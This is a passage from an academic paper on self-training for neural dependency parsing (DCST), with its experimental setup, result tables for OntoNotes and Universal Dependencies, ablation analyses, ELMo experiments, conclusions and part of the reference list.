UD languages, we consider within each language one corpus as the source domain and the other as the target domain, and apply the same train/development/test splits as above. For each language we run two experiments, differing in which of the two corpora is considered the source and which is considered the target. For all domain adaptation experiments, when training the final hybrid parser (Figure 3) we sometimes found it useful to keep the parameters of the BiLSTM tagger(s) fixed in order to avoid an overfitting of the final parser to the source domain. We treat the decision of whether or not to keep the parameters of the tagger(s) fixed as a hyper-parameter of the DCST models and tune it on the development data. We measure parsing accuracy with the standard Unlabeled and Labeled Attachment Scores (UAS and LAS), and measure statistical significance with the t-test (following Dror et al., 2018). Models and Baselines We consider four variants of our DCST algorithm, differing on the word tagging scheme on which the BiLSTM of step 4 is trained (§ 4.1): DCST-NC: with the Number of Children scheme, DCST-DR: with the Distance from the Root scheme, DCST-RPE: with the Relative POS-based Encoding scheme, and DCST-ENS where the parser is integrated with three BiLSTMs, one for each scheme (where ENS stands for ensemble) (§ 4.2). 5In languages where the development set was smaller than 1000 sentences we used the entire development set. To put the results of our DCST algorithm in context, we compare its performance to the following baselines. Base: the BiAFFINE parser (§ 3), trained on the labeled training data. Base-FS: the BiAFFINE parser (§ 3), trained on all the labeled data available in the full training set of the corpus. In the domain adaptation setups Base-FS is trained on the entire training set of the target domain. This baseline can be thought of as an upper bound on the results of a lightly-supervised learning or domain-adaptation method. Base + Random Gating (RG): a randomly initialized BiLSTM is integrated to the BiAFFINE parser through the gating mechanism, and the resulting model is trained on the labeled training data. We compare to this baseline in order to quantify the effect of the added parameters of the BiLSTM and the gating mechanism, when this mechanism does not inject any information from unlabeled data. Self- training: the traditional self-training procedure. We first train the Base parser on the labeled training data, then use the trained parser to parse the unlabeled data, and finally re-train the Base parser on both the manual and automatic trees. We would also like to test the value of training a representation model to predict the dependency labeling schemes of § 4.1, in comparison to the now standard pre-training with a language modeling objective. Hence, we experiment with a variant of DCST where the BiLSTM of step 4 is trained as a language model (DCST-LM). Finally, we compare to the cross-view training algorithm (CVT) (Clark et al., 2018), which was developed for semi-supervised learning with DNNs.6 Hyper-parameters We use the BiAFFINE parser implementation of Ma et al. (2018).7 We consider the following hyper-parameters for the parser and the sequence tagger: 100 epochs with an early stopping criterion according to the development set, the ADAM optimizer (Kingma and Ba, 2015), a batch size of 16, a learning rate of 0.002, and dropout probabilities of 0.33. The 3-layer stacked BiLSTMs of the parser and the sequence tagger generate hidden representations of size 1024. The fully connected layers of the tagger are of size 128 (first layer) 6https://github.com/tensorflow/models/ tree/master/research/cvt text. 7https://github.com/XuezheMax/NeuroNLP2. 701 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 https://github.com/tensorflow/models/tree/master/research/cvt_text https://github.com/tensorflow/models/tree/master/research/cvt_text https://github.com/XuezheMax/NeuroNLP2 bc bn mz nw pt tc wb Model UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS Base 74.54 70.77 80.57 77.63 81.47 78.41 80.40 77.56 86.95 83.86 72.15 68.34 78.74 73.24 Base+RG 77.10 73.45 81.90 79.06 83.02 80.29 81.80 79.24 88.13 85.42 73.87 69.97 78.93 75.37 DCST-LM 75.94 72.33 80.01 76.96 82.50 79.53 80.33 77.57 87.53 84.56 72.16 68.30 77.09 73.49 Self-Training 74.64 71.18 82.35 79.75 83.44 80.86 81.93 79.43 87.50 84.52 69.70 66.62 79.18 75.86 CVT 78.47 73.54 82.76 78.19 82.90 78.56 85.55 82.30 90.36 87.05 75.36 69.96 78.03 73.10 DCST-NC 78.21 74.62 82.32 79.52 83.52 80.61 81.95 79.17 88.83 85.62 75.35 71.05 78.76 75.10 DCST-DR 78.61 74.80 83.32 80.26 84.27 81.15 82.67 79.74 88.90 85.66 75.05 70.82 79.80 76.12 DCST-RPE 78.70 75.11 83.07 80.41 84.16 81.62 83.02 80.45 88.95 85.96 75.35 71.06 80.25 76.91 DCST-ENS 78.95 75.43 83.52 80.93 84.67 81.99 82.89 80.41 89.38 86.47 76.47 72.54 80.52 77.32 Base-FS 86.23 84.49 89.41 88.17 89.19 87.80 89.29 88.01 94.08 92.83 77.12 75.36 87.23 85.56 Table 1: Lightly supervised OntoNotes results with 500 training sentences. Base-FS is an upper bound. cu da fa id lv sl sv tr ur vi Model UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS Base 75.87 67.25 78.13 74.16 82.54 78.59 72.57 57.25 72.81 65.66 76.00 69.28 78.58 72.78 56.07 39.37 84.49 78.10 67.18 62.51 Base+RG 77.98 69.01 80.21 76.11 84.74 80.83 73.18 57.56 74.51 67.60 78.18 71.27 79.90 73.70 58.42 40.32 86.18 79.65 68.75 64.64 DCST-LM 77.67 68.90 80.23 76.06 83.92 79.89 72.61 57.36 73.89 66.59 76.90 70.12 78.73 72.51 57.33 39.27 85.78 79.27 69.11 65.09 Self-Training 75.19 68.07 79.76 75.92 85.04 81.05 74.07 58.73 74.79 68.22 77.71 71.33 79.72 74.12 57.34 40.06 85.63 79.51 68.24 63.96 CVT 61.57 45.60 72.77 66.93 81.08 74.32 72.51 54.94 68.90 57.36 67.89 59.79 77.08 69.60 53.17 32.95 81.49 72.72 60.84 50.98 DCST-NC 78.85 69.75 81.23 76.70 85.94 81.85 74.18 58.63 76.19 68.73 79.26 72.72 81.05 75.09 58.17 39.95 86.17 79.91 69.93 65.91 DCST-DR 79.31 70.20 81.30 76.81 86.20 82.14 74.56 58.92 76.99 69.24 80.34 73.35 81.40 75.41 58.30 40.25 86.19 79.68 69.46 65.65 DCST-RPE 80.57 71.83 81.48 77.45 86.82 82.69 74.56 59.19 77.45 70.38 80.45 74.13 81.95 75.98 59.49 41.45 86.86 80.92 70.23 66.26 DCST-ENS 80.55 71.79 82.07 78.04 87.02 83.13 74.47 59.13 77.63 70.36 80.68 74.32 82.40 76.61 59.60 41.72 86.96 80.85 70.37 66.88 Base-FS 86.13 81.46 85.55 82.93 91.06 88.12 77.42 62.31 85.02 81.59 86.04 82.22 85.18 81.36 62.21 46.23 89.84 85.12 73.26 69.69 Table 2: Lightly supervised UD results with 500 training sentences. Base-FS is an upper bound. 702 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 and 64 (second layer). All other parser hyper- parameters are identical to those of the original implementation. We utilize 300-dimensional pre-trained word embeddings: GloVe (Pennington et al., 2014)8 for English and FastText (Grave et al., 2018)9 for the UD languages. Character and POS embeddings are 100-dimensional and are initialized to random normal vectors. CVT is run for 15K gradient update steps. 7 Results Table 1 presents the lightly supervised OntoNotes results when training with 500 labeled sentences, and Table 2 presents the UD results in the same setup. Tables 3 and 4 report domain adaptation results for the 6 OntoNotes and 10 UD target do- mains, respectively. Underscored results are sig- nificant compared to the highest scoring baseline, based on t-test with p < 0.05.10 DCST with Syntactic Self-training DCST- ENS, our model that integrates all three syntactically self-trained BiLSTMs, is clearly the best model. In the lightly supervised setup, it performs best on 5 of 7 OntoNotes domains and on 8 of 10 UD corpora (with the UAS measure). In the cases where DCST-ENS is not the best performing model, it is the second or third best model. In the English and multilingual domain adaptation setups, DCST-ENS is clearly the best performing model, where in only 2 multilingual target domains it is second. Moreover, DCST-NC, DCST-DR, and DCST- RPE, which consider only one syntactic scheme, also excel in the lightly supervised setup. They outperform all the baselines (models presented above the top separating lines in the tables) in the UD experiments, and DCST-RPE and DCST-DR outperform all the baselines in 5 of 7 Ontonotes domains (with the LAS measure). In the domain adaptation setup, however, they are on par with the strongest baselines, which indicates the importance of exploiting the information in all three schemes in this setup (results are not shown in Tables 3 and 4 in order to save space). 8http://nlp.stanford.edu/data/glove. 840B.300d.zip. 9https://fasttext.cc/docs/en/crawl- vectors.html. 10For this comparison, Base-FS is not considered a baseline, but an upper bound. Note, that with few exceptions, DCST-NC is the least effective method among the syntactically self-trained DCST alternatives. This indicates that encoding the number of children each word has in the dependency tree is not a sufficiently informative view of the tree. Comparison to Baselines The CVT algorithm performs quite well in the English OntoNotes lightly supervised setup—it is the best performing model on two domains (nw and pt) and the best baseline for three other domains when considering the UAS measure (bc, bn, and tc). However, its performance substantially degrades in domain adaptation. Particularly, in 5 out of 6 OntoNotes setups and in 9 out of 10 UD setups it is the worst performing model. Moreover, CVT is the worst performing model in the lightly supervised multilingual setup. Overall, this recently proposed model that demonstrated strong results across several NLP tasks, does not rival our DCST models with syntactic self-training in our experimental tasks. Notice that Clark et al. (2018) did not experiment in domain adaptation setups and did not consider languages other than English. Our results suggest that in these cases DCST with syntactic self- training is a better alternative. We next evaluate the impact of the different components of our model. First, comparison with DCST-LM—the version of our model where the syntactically self-trained BiLSTM is replaced with a BiLSTM trained on the same unlabeled data but with a language modeling objective, allows us to evaluate the importance of the self-generated syntactic signal. The results are conclusive: in all our four setups—English and multilingual lightly supervised, and English and multilingual domain adaptation—DCST-LM is outperformed by DCST-ENS that considers all three self-trained BiLSTMs. DCST-LM is also consistently outperformed by DCST-RPE, DCST- DR and DCST-NC that consider only one syntactic annotation scheme, except from a few English lightly supervised cases where it outperforms DCST-NC by a very small margin. Syntactic self-supervision hence provides better means of exploiting the unlabeled data, compared with the standard language modeling alternative. Another question is whether the BiLSTM mod- els should be trained at all. Indeed, in recent papers untrained LSTMs with random weights 703 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 http://nlp.stanford.edu/data/glove.840B.300d.zip http://nlp.stanford.edu/data/glove.840B.300d.zip https://fasttext.cc/docs/en/crawl-vectors.html https://fasttext.cc/docs/en/crawl-vectors.html bc bn mz pt tc wb Model LAS LAS LAS LAS LAS LAS Base 81.60 85.17 85.48 87.70 75.46 83.85 Base+RG 82.51 85.36 85.77 88.34 75.68 84.34 DCST-LM 82.48 85.77 86.28 89.28 75.72 84.34 Self-Training 80.61 84.52 85.38 87.69 73.62 82.82 CVT 74.81 84.90 84.49 85.71 72.10 82.31 DCST-ENS 85.96 88.02 88.55 91.62 79.97 87.38 Base-FS 84.49 88.17 87.80 92.83 75.36 85.56 Table 3: Unsupervised Domain adaptation OntoNotes results. Base-FS is an upper bound. cs fictree cs pdt gl ctg gl treegal it isdt it postwita ro nonstandard ro rrt sv lines sv talbanken Model LAS LAS LAS LAS LAS LAS LAS LAS LAS LAS Base 69.92 81.83 59.05 60.31 67.82 80.72 65.03 62.75 77.08 77.93 Base+RG 73.12 80.86 58.97 60.52 67.54 80.36 65.93 61.50 77.58 78.04 DCST-LM 73.59 83.33 59.41 60.54 67.52 80.95 65.19 62.46 77.40 77.62 Self-Training 69.50 81.53 59.67 61.41 68.02 82.01 66.47 63.84 77.60 77.64 CVT 59.77 81.53 51.12 50.31 58.60 70.07 50.82 45.15 45.25 62.87 DCST-ENS 75.28 86.50 59.75 60.98 69.13 83.06 67.65 63.46 77.86 78.97 Base-FS 84.46 83.70 84.44 78.09 90.02 81.22 81.71 84.99 82.43 86.67 Table 4: Unsupervised Domain adaptation UD results. Base-FS is an upper bound. substantially enhanced model performance (Zhang and Bowman, 2018; Tenney et al., 2019; Wang et al., 2019; Wieting and Kiela, 2019). Our results lead to two conclusions. Firstly, Base+RG, the model that is identical to the syntactically trained DCST except that the BiAFFINE parser is integrated with a randomly initialized BiLSTM through our gating mechanism, is consistently outperformed by all our syntactically self-trained DCST models, with very few exceptions. Secondly, in line with the conclusions of the aforementioned papers, Base+RG is one of the strongest baselines in our experiments. Perhaps most importantly, in most experiments this model outperforms the Base parser—indicating the positive impact of the randomly initialized representation models. Moreover, it is the strongest baseline in 2 English domain adaptation setups and in 5 of 10 languages in the lightly supervised multilingual experiments (considering the UAS measure), and is the second-best baseline in 5 out of 7 English lightly supervised setups (again considering the UAS measure). The growing evidence for the positive impact of such randomly initialized models should motivate further investigation of the mechanism that underlies their success. Finally, our results demonstrate the limited power of traditional self-training: In English domain adaptation it harms or does not improve the Base parser; in multilingual domain adaptation it is the best model in 2 cases; and it is the best baseline in 2 of the 7 English lightly supervised setups and in 3 of the 10 multilingual lightly supervised setups. This supports our motivation to propose an improved self-training framework. 8 Ablation Analysis and Discussion Impact of Training Set Size Figure 4 presents the impact of the DCST-ENS method on the BiAFFINE parser, in the 7 lightly supervised English setups, as a function of the labeled training set size of the parser. Clearly, the positive impact is substantially stronger for smaller training sets. Particularly, when the parser is trained with 100 sentences (the green bar) the improvement is higher than 5 UAS points in 6 of 7 cases, among which in 2 (nw and wb) it is higher than 8 UAS points. For 500 training sentences the performance gap drops to 2–4 UAS points, and for 1000 training sentences it is 1–3 points. This pattern is in line with previous literature on the impact of training methods designed for the lightly supervised setup, and particularly for self- training when applied to constituency parsing (Reichart and Rappoport, 2007). We note that many studies failed to improve dependency parsing with traditional self-training even for very 704 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 Figure 4: UAS gap between DCST-ENS and the Base parser, as a function of the training set size (100/500/1000), across OntoNotes domains. small training set sizes (Rush et al., 2012). We also note that syntactically self-trained DCST consistently improves the BiAFFINE parser in our domain adaptation experiments, although the entire training set of the news (nw) section of OntoNotes is used for training. Impact of Self-training Quality We next aim to test the connection between the accuracy of the self-trained sequence taggers and the quality of the BiAFFINE parser when integrated with the BiLSTM encoders of these taggers. Ideally, we would expect that the higher the quality of the BiLSTM, the more positive its impact on the parser. This would indicate that the improvement we see with the DCST models indeed results from the information encoded in the self-trained taggers. To test this hypothesis, Figure 5 plots, for each of the BiLSTM taggers considered in this paper, the sentence-level accuracy scores of the tagger when applied to the OntoNotes test sets vs. the LAS scores of the BiAFFINE parser that was integrated with the corresponding BiLSTM, when that parser was applied to the same test sentences. In such a plot, if the regression line that fits the points has an R-squared (R2) value of 1, this indicates a positive linear relation between the self-trained tagger and the parser quality. The resulting R2 values are well aligned with the relative quality of the DCST models. Particularly, DCST-LM, the least efficient method where the tagger is trained as a language model rather than on a syntactic signal, has an R2 of 0.03. DCST-DR and DCST-NC, which are the next in terms of parsing quality (Table 1), have R2 values Figure 5: Auxiliary task accuracy scores of each BiLSTM tagger vs. the LAS score of the BiAFFINE parser when integrated with that BiLSTM. The BiLSTM scores are computed on the test sets and reflect the capability of the BiLSTM that was trained on unlabeled data with syntactic signal extracted from the base parser’s trees (or as a language model for DCST-LM) to properly tag the test sentences. The points correspond to sentence scores across all OntoNotes 5.0 test sets, and the heat map presents the frequency of each point. of 0.36 and 0.47, respectively, although DCST-DR performs slightly better. Finally, DCST-RPE, the best performing model among the four in all cases but two, has an R2 value of 0.76. These results provide a positive indication of the hypothesis that the improved parsing quality is caused by the representation model and is not a mere artifact. Tagging Scheme Quality Analysis We next aim to shed more light on the quality of the tagging schemes with which we train our BiLSTM taggers. We perform an error analysis on the parse trees produced by the final hybrid parser (Figure 3), when each of the schemes is used in the BiLSTM tagger training step during the lightly supervised setups. The metrics we compute correspond to the three tagging schemes, and our goal is to examine whether each of the self-trained representation models (BiLSTMs) improves the capability of the final parser to capture the information encoded in its tagging scheme. Particularly, we consider four metrics: Absolute Difference of Number of Children (AD-NC): The absolute difference between the number of children a word has in the gold tree and the corresponding number in the predicted tree; Absolute Difference of Distance from the Root (AD-DR): The absolute difference between the 705 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 Model AD-NC AD-DR AD-PDH POS Head Error OntoNotes Base 0.305 0.539 1.371 0.162 DCST-NC 0.274 0.510 1.196 0.146 DCST-DR 0.264 0.460 1.099 0.141 DCST-RPE 0.263 0.475 1.128 0.137 DCST-ENS 0.257 0.458 1.121 0.135 UD Base 0.366 0.600 1.377 0.163 DCST-NC 0.327 0.551 1.168 0.148 DCST-DR 0.322 0.538 1.135 0.146 DCST-RPE 0.316 0.534 1.137 0.141 DCST-ENS 0.312 0.524 1.128 0.139 Table 5: Tagging scheme error analysis. Model UAS LAS Base 54.86 52.65 DCST-LM 55.26 52.63 Self-Training 54.22 52.16 CVT 50.61 46.13 DCST-ENS 58.85 56.64 Table 6: Sentence length adaptation results. distance of a word from the root in the gold tree and the corresponding distance in the predicted tree; Absolute Difference of Positional Distance from the Head (AD-PDH): The absolute difference between the positional distance of a word from its head word according to the gold tree and the corresponding number according to the predicted tree (Kiperwasser and Ballesteros, 2018) (we count the words that separate the head from the modifier in the sentence, considering the distance negative if the word is to the right of its head); and POS Head Error: an indicator function which returns 0 if the POS tag of the head word of a given word according to the gold tree is identical to the corresponding POS tag in the predicted tree, and 1 otherwise. For all the metrics we report the mean value across all words in our test sets. The values of AD-NC, AD-DR, and AD-PDH are hence in the [0, M] range, where M is the length of the longest sentence in the corpus. The values of the POS Head Error are in the [0, 1] range. For all metrics lower values indicate that the relevant information has been better captured by the final hybrid parser. Table 5 presents a comparison between the Base parser to our DCST algorithms. All in all, the DCST models outperform the Base parser across all comparisons, with DCST-ENS being the best model in all 8 cases except from one. The analysis indicates that in some cases a BiLSTM tagger with a given tagging scheme directly improves the capability of the final parser to capture the corresponding information. For example, DCST- DR, whose tagging scheme considers the distance of each word from the root of the tree, performs best (OntoNotes) or second best (UD) on the AD- DR metric compared to all other models except for the DCST-ENS model that contains the DCST- DR model as a component. Likewise, DCST-RPE, which encodes information about the POS tag of the head word for every word in the sentence, is the best performing model in terms of POS Head Error. In contrast to the relative success of DCST-RPE and DCST-DR in improving specific capabilities of the parser, DCST-NC, our weakest model across experimental setups, is also the weakest DCST model in this error analysis, even when considering the AD-NC metric that measures success in predicting the number of children a word has in the tree. Sentence Length Adaptation We next aim to test whether DCST can enhance a parser trained on short sentences so that it can better parse long sentences. Dependency parsers perform better on short sentences, and we would expect self-training to bring in high-quality syntactic information from automatically parsed long sentences. For this aim, we replicate the OntoNotes wb in-domain experiment, except that we train the parser on all training set sentences of up to 10 words, use the training set sentences with more than 10 words as unlabeled data for sequence tagger training (Algorithm 1, step 4), and test the final parser on all test sentences with more than 10 words. Table 6 shows that DCST-ENS improves the Base parser in this setup by 3.99 UAS and LAS points. DCST-LM achieves only a marginal UAS improvement while CVT substantially harms the parser. This result further supports the value of our methods and encourages future research in various under-resourced setups. ELMo Embeddings Finally, we turn to invest- igate the impact of deep contextualized word em- beddings, such as ELMo (Peters et al., 2018), on the base parser and on the DCST-ENS model. To this end, we replace the Glove/FastText word embeddings from our original experiments with 706 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 bc bn mz nw pt tc wb Model UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS Base+ELMo 77.96 73.97 83.12 80.18 84.62 81.37 83.09 80.35 88.82 85.55 73.84 69.23 79.67 75.77 Base+ELMo+G 74.47 70.91 80.42 77.45 81.15 78.41 80.91 78.24 87.73 84.92 70.19 66.78 76.02 72.68 DCST-ENS+ELMo 80.00 75.94 85.02 81.98 86.24 82.54 84.56 81.91 90.27 86.86 77.68 72.72 82.00 77.93 Table 7: Lightly supervised OntoNotes results with ELMo embeddings. cu da fa id lv sl sv tr ur vi Model UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS Base+ELMo 72.35 61.43 80.32 76.86 85.84 81.71 73.68 58.01 79.93 73.91 76.40 67.52 81.51 76.10 53.36 34.67 86.11 79.91 71.28 67.04 Base+ELMo+G 75.47 67.07 79.12 75.05 83.09 79.43 73.00 57.69 72.86 67.13 74.99 69.75 79.66 74.29 53.87 39.30 84.83 78.53 66.57 61.56 DCST-ENS+ELMo 73.90 61.62 82.29 78.49 87.87 83.25 74.95 58.55 82.47 76.41 79.69 70.36 83.93 78.27 59.35 36.81 87.51 81.53 72.76 68.48 Table 8: Lightly supervised UD results with ELMo embeddings. 707 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 the multilingual ELMo word embeddings of Che et al. (2018). We follow Che et al. (2018) and define the ELMo word embedding for word i as: wi = W ELMo · 1 3 ∑2 j=0 h ELMo i,j , where W ELMo is a trainable parameter and hELMoi,j is the hidden representation for word i in the j’th BiLSTM layer of the ELMo model, which remains fixed throughout all experiments. We experiment with three models: Base + ELMo: the BiAFFINE parser fed by the ELMo word embeddings and trained on the labeled training data; Base + ELMo + Gating (G): the BiAFFINE parser fed by our original word embeddings, and ELMo word embeddings are integrated through our gating mechanism. Training is done on the labeled training data only; and DCST-ENS + ELMo: our ensemble parser where the BiLSTM taggers and the Base parser are fed by the ELMo word embeddings. Tables 7 (OntoNotes) and 8 (UD) summarize the results in the lightly supervised setups with 500 training sentences. As in previous experiments, DCST-ENS+ELMo is the best performing model in both setups. Although Base+ELMo+G is superior in the cu and tr (LAS) setups, it is inferior in all OntoNotes domains. Note also that DCST-ENS+ELMo improves the UAS results of DCST-ENS from Tables 1 and 2 on all OntoNotes domains and on 7 out of 10 UD languages. 9 Conclusions We proposed a new self-training framework for dependency parsing. Our DCST approach is based on the integration of (a) contextualized em- bedding model(s) into a neural dependency parser, where the embedding models are trained on word tagging schemes extracted from the trees generated by the base parser on unlabeled data. In multilingual lightly supervised and domain adaptation experiments, our models consistently outperform strong baselines and previous models. In future work we intend to explore improved word tagging schemes, sequence tagging archi- tectures, and integration mechanisms. We shall also consider cross-language learning where the lexical gap between languages should be overcome. Acknowledgments We would like to thank the action editor and the reviewers, as well as the members of the IE@Technion NLP group for their valuable feedback and advice. This research was partially funded by an ISF personal grant no. 1625/18. References Steven Abney. 2004. Understanding the Yarowsky algorithm. Computational Linguistics, 30(3): 365–395. Gabor Angeli, Melvin Jose Johnson Premkumar, and Christopher D. Manning. 2015. Leveraging linguistic structure for open domain information extraction. In Proceedings of ACL. Mikel Artetxe, Gorka Labaka, and Eneko Agirre. 2018. A robust self-learning method for fully unsupervised cross-lingual mappings of word embeddings. In Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 789–798. Melbourne. Avrim Blum and Tom Mitchell. 1998. Combining labeled and unlabeled data with co-training. In Proceedings of the Eleventh Annual Conference on Computational Learning Theory, pages 92–100. Wanxiang Che, Yijia Liu, Yuxuan Wang, Bo Zheng, and Ting Liu. 2018. Towards better ud parsing: Deep contextualized word em- beddings, ensemble, and treebank concatena- tion. In Proceedings of the CoNLL 2018 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies, pages 55–64. Wenliang Chen, Youzheng Wu, and Hitoshi Isahara. 2008. Learning reliable information for dependency parsing adaptation. In Proceedings of the 22nd International Conference on Com- putational Linguistics-Volume 1, pages 113–120. Wenliang Chen, Yue Zhang, and Min Zhang. 2014. Feature embedding for dependency parsing. In Proceedings of COLING 2014, the 25th International Conference on Computational Linguistics: Technical Papers, pages 816–826. Kevin Clark, Minh-Thang Luong, Christopher D. Manning, and Quoc V. Le. 2018. Semi- supervised sequence modeling with cross-view training. In Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing, pages 1914–1925. 708 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 Djork-Arné Clevert, Thomas Unterthiner, and Sepp Hochreiter. 2016. Fast and accurate deep network learning by exponential linear units (ELUs). In 4th International Conference on Learning Representations, ICLR 2016, San Juan, Puerto Rico, Conference Track Proceedings. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. 2019. BERT: Pre-training of deep bidirectional transformers for language understanding. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers), pages 4171–4186, Minneapolis, MN. Timothy Dozat and Christopher D. Manning. 2017. Deep biaffine attention for neural dependency parsing. In 5th International Conference on Learning Representations, ICLR 2017, Toulon, France, Conference Track Proceedings. Rotem Dror, Gili Baumer, Segev Shlomov, and Roi Reichart. 2018. The hitchhikers guide to testing statistical significance in natural language processing. In Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 1383–1392, Melbourne. Jack Edmonds. 1967. Optimum branchings. Journal of Research of the National Bureau of Standards B, 71(4):233–240. Dan Goldwasser, Roi Reichart, James Clarke, and Dan Roth. 2011. Confidence driven un- supervised semantic parsing. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies, pages 1486–1495. Edouard Grave, Piotr Bojanowski, Prakhar Gupta, Armand Joulin, and Tomas Mikolov. 2018. Learning word vectors for 157 languages. In Proceedings of the International Conference on Language Resources and Evaluation (LREC 2018). Christian Hadiwinoto and Hwee Tou Ng. 2017. A dependency-based neural reordering model for statistical machine translation. In Thirty-First AAAI Conference on Artificial Intelligence. Yulan He and Deyu Zhou. 2011. Self-training from labeled features for sentiment analysis. Information Processing & Management, 47(4): 606–616. Daniel Hershcovich, Omri Abend, and Ari Rappoport. 2017. A transition-based directed acyclic graph parser for UCCA. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), volume 1, pages 1127–1138. Eduard Hovy, Mitchell Marcus, Martha Palmer, Lance Ramshaw, and Ralph Weischedel. 2006. Ontonotes: The 90% solution. In Proceedings of the Human Language Technology Conference of the NAACL, Companion Volume: Short Papers. Kenji Imamura and Eiichiro Sumita. 2018. NICT self-training approach to neural machine translation at NMT-2018. In Proceedings of the 2nd Workshop on Neural Machine Translation and Generation, pages 110–115. Diederik P. Kingma and Jimmy Ba. 2015. Adam: A method for stochastic optimization. In Proceedings of ICLR. Eliyahu Kiperwasser and Miguel Ballesteros. 2018. Scheduled multi-task learning: From syntax to translation. Transactions of the Association for Computational Linguistics, 6:225–240. Eliyahu Kiperwasser and Yoav Goldberg. 2016. Simple and accurate dependency parsing using bidirectional LSTM feature represen- tations. Transactions of the Association for Computational Linguistics, 4:313–327. Omer Levy and Yoav Goldberg. 2014. Dependency- based word embeddings. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), volume 2, pages 302–308. Xuezhe Ma, Zecong Hu, Jingzhou Liu, Nanyun Peng, Graham Neubig, and Eduard Hovy. 2018. Stack-pointer networks for dependency parsing. In Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 1403–1414. 709 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 Diego Marcheggiani, Anton Frolov, and Ivan Titov. 2017. A simple and accurate syntax-agnostic neural model for dependency-based semantic role labeling. In Proceedings of CoNLL. Bryan McCann, James Bradbury, Caiming Xiong, and Richard Socher. 2017. Learned in translation: Contextualized word vectors. In Advances in Neural Information Processing Systems, pages 6294–6305. David McClosky, Eugene Charniak, and Mark Johnson. 2006a. Effective self-training for parsing. In Proceedings of the Main Conference on Human Language Technology Conference of the North American Chapter of the Association of Computational Linguistics, pages 152–159. David McClosky, Eugene Charniak, and Mark Johnson. 2006b. Reranking and self-training for parser adaptation. In Proceedings of the 21st International Conference on Computational Linguistics and the 44th annual meeting of the Association for Computational Linguistics, pages 337–344. David McClosky, Eugene Charniak, and Mark Johnson. 2010. Automatic domain adaptation for parsing. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguistics, pages 28–36. Ryan McDonald, Joakim Nivre, Yvonne Quirmbach-Brundage, Yoav Goldberg, Dipanjan Das, Kuzman Ganchev, Keith Hall, Slav Petrov, Hao Zhang, Oscar Täckström, Claudia Bedini, Núria Bertomeu Castelló, and Jungmee Lee. 2013. Universal dependency annotation for multilingual parsing. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), volume 2, pages 92–97. Rada Mihalcea. 2004. Co-training and self- training for word sense disambiguation. In Proceedings of the Eighth Conference on Computational Natural Language Learning (CoNLL-2004) at HLT-NAACL 2004. Joakim Nivre, Mitchell Abrams, Željko Agić, Lars Ahrenberg, Lene Antonsen, Maria Jesus Aranzabe, Gashaw Arutie, Masayuki Asahara, Luma Ateyah, Mohammed Attia, Aitziber Atutxa, Liesbeth Augustinus, Elena Badmaeva, Miguel Ballesteros, Esha Banerjee, Sebastian Bank, Verginica Barbu Mititelu, John Bauer, Sandra Bellato, Kepa Bengoetxea, Riyaz Ahmad Bhat, Erica Biagetti, Eckhard Bick, Rogier Blokland, Victoria Bobicev, Carl Börstell, Cristina Bosco, Gosse Bouma, Sam Bowman, Adriane Boyd, Aljoscha Burchardt, Marie Candito, Bernard Caron, Gauthier Caron, Gülşen Cebiroğlu Eryiğit, Giuseppe G. A. Celano, Savas Cetin, Fabricio Chalub, Jinho Choi, Yongseok Cho, Jayeol Chun, Silvie Cinková, Aurélie Collomb, Çağrı Çöltekin, Miriam Connor, Marine Courtin, Elizabeth Davidson, Marie-Catherine Marneffe, Valeria Paiva, Arantza Ilarraza, Carly Dickerson, Peter Dirix, Kaja Dobrovoljc, Timothy Dozat, Kira Droganova, Puneet Dwivedi, Marhaba Eli, Ali Elkahky, Binyam Ephrem, Tomaž Erjavec, Aline Etienne, Richárd Farkas, Hector Fernandez Alcalde, Jennifer Foster, Cláudia Freitas, Katarı́na Gajdošová, Daniel Galbraith, Marcos Garcia, Moa Gärdenfors, Kim Gerdes, Filip Ginter, Iakes Goenaga, Koldo Gojenola, Memduh Gökırmak, Yoav Goldberg, Xavier Gómez Guinovart, Berta Gonzáles Saavedra, Matias Grioni, Normunds Grūzı̄tis, Bruno Guillaume, Céline Guillot-Barbance, Nizar Habash, Jan Hajič, Jan Hajič Jr., Linh Hà Mỹ, Na-Rae Han, Kim Harris, Dag Haug, Barbora Hladká, Jaroslava Hlaváčová, Florinel Hociung, Petter Hohle, Jena Hwang, Radu Ion, Elena Irimia, Tomáš Jelı́nek, Anders Johannsen, 